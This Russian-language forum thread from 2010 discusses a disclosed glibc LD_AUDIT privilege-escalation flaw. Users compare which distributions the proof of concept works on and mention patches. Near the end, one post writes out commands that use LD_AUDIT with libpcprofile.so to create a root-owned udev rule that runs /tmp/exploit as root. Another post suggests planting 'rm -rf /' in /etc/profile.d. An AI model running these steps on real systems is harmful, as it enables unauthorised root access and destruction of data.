forum.opennet.ru

Форум Разговоры, обсуждение новостей
Вариант для распечатки		Пред. тема \| След. тема
Режим отображения отдельной подветви беседы		[ Отслеживать ]

Оглавление

Для Glibc представлен еще один метод повышения привилегий, opennews (?), 23-Окт-10, (0) [смотреть все]

Yes У разработчиков прямые руки, да и сам дистрибутив хороший , Зенитар (?), 10:17 , 23-Окт-10, (2) +3 //

Это всё Дима Левин ldv , Michael Shigorin (ok), 15:23 , 24-Окт-10, (94) +2
Если у них прямые руки, то почему их Simple Linux при установке зависает наглухо, Andrei (??), 05:45 , 25-Окт-10, (96)

В Генте не пашет Только что проверилimpressed satan LD_AUDIT libprocfile s, ImPressed (ok), 10:25 , 23-Окт-10, (3) –3 //

А версия glibc какая , Аноним (-), 10:42 , 23-Окт-10, (6) //

impressed satan lib libc-2 12 1 so GNU C Library stable release version 2 1, ImPressed (ok), 10:51 , 23-Окт-10, (8) //

Для Glibc представлен еще один метод повышения привилегий, Аноним (-), 10:53 , 23-Окт-10, (10)

Версия 2 12 новее версии 2 4 Легко запутаться Да я и сам запутался , Zenitur (?), 11:32 , 23-Окт-10, (12) –1
Что-то мне подсказывает, что 2 12 более поздняя, чем 2 4 Gentoo, libc-2 11 2, ра, Ананимуз (?), 11:37 , 23-Окт-10, (15)

gentoo, glibc 2 10 1-r1bazil k4 ls -l tmp exploit -rwsr-xr-x 1 root root 88, Dmitriy (??), 12:49 , 23-Окт-10, (20) –1

Шелл сбрасывает привилегии, если uid не равен euid tmp exploit -p в помощь И , paxuser (ok), 13:19 , 23-Окт-10, (26) +1

В генте не работает x201 lib64 libc-2 12 1 so GNU C Library stable releas, alexxy (?), 17:02 , 23-Окт-10, (50)

umask 0 забыл, filosofem (ok), 18:34 , 23-Окт-10, (64)

Ну с umask 0 который я действительно забыл файл становится rw rw rw но это , alexxy (?), 19:47 , 23-Окт-10, (74) +2

А знаете, если я могу записать в любой файл в ОС - я определенно там сделаю что , User294 (ok), 00:47 , 24-Окт-10, (88)

Это то понятно если есть возможность записи в произвольные места то напакости, alexxy (?), 02:27 , 24-Окт-10, (91)
Не в данном случае, а данным способом В разного рода смелых заявлениях вы не од, paxuser (ok), 03:38 , 24-Окт-10, (92) +1
taviso i do not have time to teach these noobs basic UNIX taviso after sendin, taaroa (ok), 07:41 , 24-Окт-10, (93)

У тебя просто не установлен glibc-utils, anonymous (??), 12:50 , 23-Окт-10, (21)

Исправь libprocfile so на libpcprofile so и все заработает, сам использую gentoo, Аноним (-), 14:28 , 23-Окт-10, (33) //

Да, не долго радовался Oct 23 14 30 01 gentoo-book cron 5251 root CMD test , Аноним (-), 14:35 , 23-Окт-10, (34) //

Например, вместо etc cron d exploit создайте etc logrotate d exploit или etc , Аноним (-), 17:27 , 23-Окт-10, (54)

А чёй-то у тя директория имеет время более позднее чем созданное тут сообщение , pavlinux (ok), 17:02 , 23-Окт-10, (49) –3 //

Есть такое понятие - часовой пояс И их много , КО (?), 22:04 , 23-Окт-10, (85) +2

Что-то у меня как-то ни чего не появляется в etc cron d , ImPressed (ok), 10:25 , 23-Окт-10, (4) //

Это proof of concept, и если он не работает, это говорит о непригодности эксплой, paxuser (ok), 10:37 , 23-Окт-10, (5)

У меня в дженту с последними апдейтами работает, Аноним (-), 10:49 , 23-Окт-10, (7) +1 //

У меня не работает Версия 2 12 1 с patchset 2, ImPressed (ok), 10:53 , 23-Окт-10, (9)
Апдейты не последние неосновной дистрибутив - не работает , Zenitur (?), 11:33 , 23-Окт-10, (13)

у меня арч с glibc 2 12 1 и пример не работаетСначало я ра надостях начал исполн, поцанчик (ok), 11:37 , 23-Окт-10, (14) –2
libc-2 12 1 so test myhost uname -aLinux myhost 2 6 35-ARCH 1 SMP PREEMPT , Аноним (-), 11:46 , 23-Окт-10, (16) –4
centos-5 5 давно не обновляемая 64битная версия не работает, Аноним (-), 12:04 , 23-Окт-10, (17)
В Арче работает pacman -Qi glibcНазвание glibcВерсия , AX (?), 12:18 , 23-Окт-10, (18) //

У меня в Арче файл etc cron d exploit создаётся с правами -rw-rw-rw- crond проп, аноним (?), 13:01 , 23-Окт-10, (22) //

Аналогично, stranger (??), 13:37 , 23-Окт-10, (27) //

Debian Squeeze with latest updates, stranger (??), 13:39 , 23-Окт-10, (28)

нужно x чтобы исполнялось, но это не важно - дырка же есть , eigrad (?), 14:56 , 23-Окт-10, (35) //

зачем этому файлу право на исполнение когда в нём просто хранится текстовая стро, аноним (?), 15:02 , 23-Окт-10, (36) +1

Патч с заплаткой, работает для glibc-2 12 1 в Gentoo проверено только с USE har, paxuser (ok), 13:02 , 23-Окт-10, (23) //

Пардон, в 2 11 2 Другие версии не смотрел , paxuser (ok), 13:04 , 23-Окт-10, (24)

Fedora 13 update https admin fedoraproject org updates glibc-2 12 1-4, Иван Иванович Иванов (?), 13:49 , 23-Окт-10, (30)
пошёл ставить selinux , Аноним (-), 14:10 , 23-Окт-10, (31) //

А вот, кстати, да Ведь selinux политика на cron которая включена по дефолту и , Stax (ok), 14:25 , 23-Окт-10, (32) //

Вы путаете баг и PoC-эксплойт , paxuser (ok), 15:09 , 23-Окт-10, (39) +2

proof of concept достаточно хилый, подумаешь создали файл от рута, один хрен в н, eigrad (?), 15:04 , 23-Окт-10, (37) //

но уязвимость в наличии, тут не поспоришь РЕШЕТО , eigrad (?), 15:05 , 23-Окт-10, (38)
имеется возможность создать любой файл в любом месте , Аноним (-), 19:58 , 23-Окт-10, (76)
Создали файл в etc cron dПотом благодаря аттрибутам 666, записали такое в него , Pentarh (?), 20:47 , 25-Окт-10, (103)

uname -aLinux 2 6 36-gentoo 1 SMP PREEMPT Thu Oct 21 20 45 59, Андрей (??), 15:21 , 23-Окт-10, (40) //

Хотя, не не ошибка app-shells dash Available versions 0 5 5 1 2 0 5, Андрей (??), 15:30 , 23-Окт-10, (41) //

Зачем тебе линукс, если ты не понимаешь, что делаешь , meego (?), 15:32 , 23-Окт-10, (42) +1

Ты маленько не понимаешь того простого факта, что имея в руках запуск кроном тво, PavelR (??), 17:15 , 23-Окт-10, (51)

echo app-shells dash etc portage package mask app-shellsчто раньше появило, Андрей (??), 18:36 , 23-Окт-10, (65) –1

точно знаю что раньше куриц появились бараны по теме А можно так printf , PavelR (??), 19:25 , 23-Окт-10, (71) +1

поставил dashOct 23 19 43 01 kids cron 2257 system BAD FILE MODE etc cro, Андрей (??), 19:44 , 23-Окт-10, (73)

если с bin bash не сработало, с bin dash не сработало, почему оно должно срабо, Андрей (??), 19:51 , 23-Окт-10, (75)

При чем тут шелл etc cron d exploit создался Команды выполняет Хорошо Сдела, PavelR (??), 20:38 , 23-Окт-10, (80)

cat proc mounts 124 grep boot dev sda1 boot xfs ro,sync,nodev,relatime 0 , pavlinux (ok), 20:48 , 23-Окт-10, (81) –1

рутом можно и mount -o rw,remount bootсделать Ищщо вопросы , zZz (?), 22:51 , 23-Окт-10, (86)
Поздно, сначала надо было писать , pavlinux (ok), 00:36 , 24-Окт-10, (87)
Эээ ты надеешься законопатить доступ в систему без пяти минут root у Или к че, User294 (ok), 01:03 , 24-Окт-10, (89)
Ладно, проехали, поболтали и будя Да, есть рут - считай п ц системе , pavlinux (ok), 01:32 , 24-Окт-10, (90) +1

tmp exploit -p, paxuser (ok), 15:36 , 23-Окт-10, (43)

ls -l etc cron dtotal 4-rw-rw-r-- 1 root root 4 2010-10-23 15 35 exploitфайл, V (??), 15:43 , 23-Окт-10, (44) //

аналогично но у меня vixie-cron Oct 23 14 19 01 andrewisakov cron 3520 syst, Андрей (??), 16:08 , 23-Окт-10, (47) //

На etc cron d exploit должны быть права 644, чтобы cron не ругался , aNoN (?), 17:26 , 23-Окт-10, (53) //

А 044 нафига , pavlinux (ok), 17:37 , 23-Окт-10, (59)

неа файло не создается, в логе крона тишина, daevy (ok), 17:46 , 23-Окт-10, (61)

1 та же байдаLinux deceiver 2 6 35-gentoo 31 SMP Sat Sep 18 01 38 57 UTC 2010 , daevy (??), 17:36 , 23-Окт-10, (57)

tailf var log messages Oct 23 16 57 01 suse64 usr sbin cron 1577 system_u, pavlinux (ok), 17:29 , 23-Окт-10, (55)
дык это ж selinux отключи и познай безграничное дао, linux_must_die (ok), 17:35 , 23-Окт-10, (56)
В общем, на funtoo 1 Права на etc cron d exploit должны быть 644, иначе vixie-, aNoN (?), 17:36 , 23-Окт-10, (58) //

FEATURES sfperms по умолчанию, aNoN (?), 18:31 , 23-Окт-10, (63)

userx i13 umask 0userx i13 ls etc cron dcron d cron daily cron de, 666joy666 (ok), 18:28 , 23-Окт-10, (62)
А я веселее придумал Идем домой, cd Пишем дружественный модульpavel suse64 , pavlinux (ok), 19:06 , 23-Окт-10, (66) +3 //

А, например, в etc profile d boo sh rm -rf запихнуть не проще будет , aNoN (?), 19:13 , 23-Окт-10, (68) //

Запихнуть можно, но нужно чтоб его оттуда кто-то вызвал Причём с правами рута В, pavlinux (ok), 19:18 , 23-Окт-10, (69) //

При том же рестарте системы он отработает Или при логине рута , aNoN (?), 19:24 , 23-Окт-10, (70)

Да не работает оно само Там наборы переменных и функций башовских, их надо вклю, pavlinux (ok), 20:11 , 23-Окт-10, (77)

У меня отработало От юзера при логине ругается на отсутствие прав При логине ру, aNoN (?), 21:10 , 23-Окт-10, (83)

Какого юзера, какого рута man bash на предмет INVOCATION, pavlinux (ok), 21:16 , 23-Окт-10, (84)

кстати я тоже думал в etc profile засунуть интересно, а куда еще можно чего за, Аноним (-), 19:30 , 23-Окт-10, (72) //

Нельзя -rw-r--r-- 1 root root 9012 Авг 4 2009 etc profileНу вот и проверь себ, pavlinux (ok), 20:15 , 23-Окт-10, (78)
В UDEV подсунь code lsusb Bus 001 Device 001 ID 1d6b 0002 Linux Foundation 2, pavlinux (ok), 20:23 , 23-Окт-10, (79)
apache mpm_itk, Kostik (??), 22:49 , 26-Окт-10, (105)

Для RHEL libmemusage so входит в совсем необязательный rpm glibc-utilsХотфикс - , gogo (?), 16:02 , 24-Окт-10, (95) //

Тут на лоре такой вариант предложили для особо упорствующих umask 0 LD_AUDIT , xdsl (?), 08:31 , 25-Окт-10, (97) //

для особо одаренных пожалуй надо повторить не стоит пакета glibc-utils- нет lib, утер (?), 08:34 , 25-Окт-10, (98) //

Во-первых, не во всех дистрах glibc и glibc-utils разделены Во-вторых, libpcprof, AX (?), 09:47 , 25-Окт-10, (100)
тут ошибка не конкретная, а системная и этот и предыдущий баг нужно фиксить во , анончик (?), 13:12 , 25-Окт-10, (101)

sys-libs glibc-2 11 2 не работает Oct 25 09 18 01 cron 3032 system BAD FIL, i (??), 09:12 , 25-Окт-10, (99) //

если не получается с помощью cron то есть другие методы, например ниже изложен м, аноним (?), 20:16 , 25-Окт-10, (102) //

в генте в нестабильном профиле приехал glibc-2 12 1-r2 сегоднядыра закрыта, nik (??), 14:59 , 27-Окт-10, (106)

Сообщения [Сортировка по времени | RSS]

68. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от aNoN (?), 23-Окт-10, 19:13

А, например, в /etc/profile.d/boo.sh "rm -rf /" запихнуть не проще будет?

Ответить | Правка | Наверх | Cообщить модератору

69. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от pavlinux (ok), 23-Окт-10, 19:18

> А, например, в /etc/profile.d/boo.sh "rm -rf /" запихнуть не проще будет?
Запихнуть можно, но нужно чтоб его оттуда кто-то вызвал. Причём с правами рута.
В общем, эта дыра хороший тест - "Насколько я хорошо знаю как работает Linux!" :)

Ответить | Правка | Наверх | Cообщить модератору

70. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от aNoN (?), 23-Окт-10, 19:24

При том же рестарте системы он отработает. Или при логине рута.

Ответить | Правка | Наверх | Cообщить модератору

77. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от pavlinux (ok), 23-Окт-10, 20:11

> При том же рестарте системы он отработает. Или при логине рута.
Да не работает оно само! Там наборы переменных и функций башовских,
их надо включать и вызывать
Speшаl фо you
pavel@suse64:~> cat /etc/profile.d/boo.sh
#!/bin/bash
echo "ЖОПА" > /DJOPA
---
# init 6
...
#  ls -pa /
./   boot/    dev/  home/  lib64/  mnt/  proc/  sbin/  srv/  tmp/  var/
../  bin/ etc/  lib/   media/  opt/  root/  sched_fair.patch  sys/  usr/
Нэту!

Ответить | Правка | Наверх | Cообщить модератору

83. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от aNoN (?), 23-Окт-10, 21:10

У меня отработало.
От юзера при логине ругается на отсутствие прав. При логине рута выполняет всё.

Ответить | Правка | Наверх | Cообщить модератору

84. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от pavlinux (ok), 23-Окт-10, 21:16

> У меня отработало.
> От юзера при логине ругается на отсутствие прав. При логине рута выполняет
> всё.
Какого юзера, какого рута...

man bash на предмет INVOCATION

Ответить | Правка | Наверх | Cообщить модератору

72. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от Аноним (-), 23-Окт-10, 19:30

кстати я тоже думал в /etc/profile засунуть. интересно, а куда еще можно чего засунуть, чтобы получить рута?

Ответить | Правка | К родителю #68 | Наверх | Cообщить модератору

78. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от pavlinux (ok), 23-Окт-10, 20:15

> кстати я тоже думал в /etc/profile засунуть.
Нельзя
-rw-r--r-- 1 root root 9012 Авг  4  2009 /etc/profile
> интересно, а куда еще можно чего засунуть, чтобы получить рута?
Ну вот и проверь себя.

Ответить | Правка | Наверх | Cообщить модератору

79. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от pavlinux (ok), 23-Окт-10, 20:23

> кстати я тоже думал в /etc/profile засунуть. интересно, а куда еще можно
> чего засунуть, чтобы получить рута?
В UDEV подсунь.

$ lsusb
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 002 Device 003: ID 0a12:0001 Cambridge Silicon Radio, Ltd Bluetooth Dongle (HCI mode)
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/udev/rules.d/45-svistok.rules" ping
$ printf 'SUBSYSTEM!="usb_device", GOTO="end"\n ACTION!="add", GOTO="end"\n ATTRS{idVendor}=="0a12", ATTRS{idProduct}=="0001", RUN+="/tmp/exploit"\n LABEL="end"\n' > /etc/udev/rules.d/45-svistok.rules
$ cat /etc/udev/rules.d/45-svistok.rules
SUBSYSTEM!="usb_device", GOTO="end"
ACTION!="add", GOTO="end"
ATTRS{idVendor}=="0a12", ATTRS{idProduct}=="0001", RUN+="/tmp/exploit"
LABEL="end"

Ответить | Правка | К родителю #72 | Наверх | Cообщить модератору

105. "Для Glibc представлен еще один метод повышения привилегий" +/–

Сообщение от Kostik (??), 26-Окт-10, 22:49

> интересно, а куда еще можно
> чего засунуть, чтобы получить рута?
apache+mpm_itk

Ответить | Правка | К родителю #72 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру


	68. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от aNoN (?), 23-Окт-10, 19:13
	А, например, в /etc/profile.d/boo.sh "rm -rf /" запихнуть не проще будет?
	Ответить \| Правка \| Наверх \| Cообщить модератору


	69. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от pavlinux (ok), 23-Окт-10, 19:18
	> А, например, в /etc/profile.d/boo.sh "rm -rf /" запихнуть не проще будет? Запихнуть можно, но нужно чтоб его оттуда кто-то вызвал. Причём с правами рута. В общем, эта дыра хороший тест - "Насколько я хорошо знаю как работает Linux!" :)
	Ответить \| Правка \| Наверх \| Cообщить модератору


	70. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от aNoN (?), 23-Окт-10, 19:24
	При том же рестарте системы он отработает. Или при логине рута.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	77. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от pavlinux (ok), 23-Окт-10, 20:11
	> При том же рестарте системы он отработает. Или при логине рута. Да не работает оно само! Там наборы переменных и функций башовских, их надо включать и вызывать Speшаl фо you pavel@suse64:~> cat /etc/profile.d/boo.sh #!/bin/bash echo "ЖОПА" > /DJOPA --- # init 6 ... # ls -pa / ./ boot/ dev/ home/ lib64/ mnt/ proc/ sbin/ srv/ tmp/ var/ ../ bin/ etc/ lib/ media/ opt/ root/ sched_fair.patch sys/ usr/ Нэту!
	Ответить \| Правка \| Наверх \| Cообщить модератору


	83. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от aNoN (?), 23-Окт-10, 21:10
	У меня отработало. От юзера при логине ругается на отсутствие прав. При логине рута выполняет всё.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	84. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от pavlinux (ok), 23-Окт-10, 21:16
	> У меня отработало. > От юзера при логине ругается на отсутствие прав. При логине рута выполняет > всё. Какого юзера, какого рута... man bash на предмет INVOCATION
	Ответить \| Правка \| Наверх \| Cообщить модератору


	72. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от Аноним (-), 23-Окт-10, 19:30
	кстати я тоже думал в /etc/profile засунуть. интересно, а куда еще можно чего засунуть, чтобы получить рута?
	Ответить \| Правка \| К родителю #68 \| Наверх \| Cообщить модератору


	78. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от pavlinux (ok), 23-Окт-10, 20:15
	> кстати я тоже думал в /etc/profile засунуть. Нельзя -rw-r--r-- 1 root root 9012 Авг 4 2009 /etc/profile > интересно, а куда еще можно чего засунуть, чтобы получить рута? Ну вот и проверь себя.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	79. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от pavlinux (ok), 23-Окт-10, 20:23
	> кстати я тоже думал в /etc/profile засунуть. интересно, а куда еще можно > чего засунуть, чтобы получить рута? В UDEV подсунь. $ lsusb Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Bus 002 Device 003: ID 0a12:0001 Cambridge Silicon Radio, Ltd Bluetooth Dongle (HCI mode) $ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/udev/rules.d/45-svistok.rules" ping $ printf 'SUBSYSTEM!="usb_device", GOTO="end"\n ACTION!="add", GOTO="end"\n ATTRS{idVendor}=="0a12", ATTRS{idProduct}=="0001", RUN+="/tmp/exploit"\n LABEL="end"\n' > /etc/udev/rules.d/45-svistok.rules $ cat /etc/udev/rules.d/45-svistok.rules SUBSYSTEM!="usb_device", GOTO="end" ACTION!="add", GOTO="end" ATTRS{idVendor}=="0a12", ATTRS{idProduct}=="0001", RUN+="/tmp/exploit" LABEL="end"
	Ответить \| Правка \| К родителю #72 \| Наверх \| Cообщить модератору


	105. "Для Glibc представлен еще один метод повышения привилегий"	+/–
	Сообщение от Kostik (??), 26-Окт-10, 22:49
	> интересно, а куда еще можно > чего засунуть, чтобы получить рута? apache+mpm_itk
	Ответить \| Правка \| К родителю #72 \| Наверх \| Cообщить модератору